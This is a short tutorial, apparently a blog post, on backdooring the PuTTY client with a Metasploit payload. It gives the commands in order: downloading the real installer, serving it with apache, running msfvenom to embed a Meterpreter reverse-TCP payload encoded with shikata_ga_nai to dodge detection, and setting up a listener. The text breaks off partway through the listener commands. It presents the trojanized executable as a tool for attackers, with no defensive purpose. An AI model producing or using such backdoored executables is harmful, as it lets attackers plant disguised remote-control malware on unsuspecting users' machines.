Backdooring an Executable: Creating customized backdoored executables often took a long period of time to do manually as attackers. The ability to embed a Metasploit Payload in any executable that you want is simply brilliant. When we say any executable, it means any executable. You want to backdoor something you download from the internet? We begin by first downloading our legitimate executable, in this case, the popular PuTTY client. STEP 1: Downloading Putty wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe STEP 2: Start apache server using the following command: service apache2 start STEP 3: Create the malicious executable using the following command: msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.43.15 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe Note: Replace IP here with your own IP STEP 4: Open msfconsole and type the following commands: use exploit/multi/handler set payload windo
Krishna Sharma
Attack is the best defence.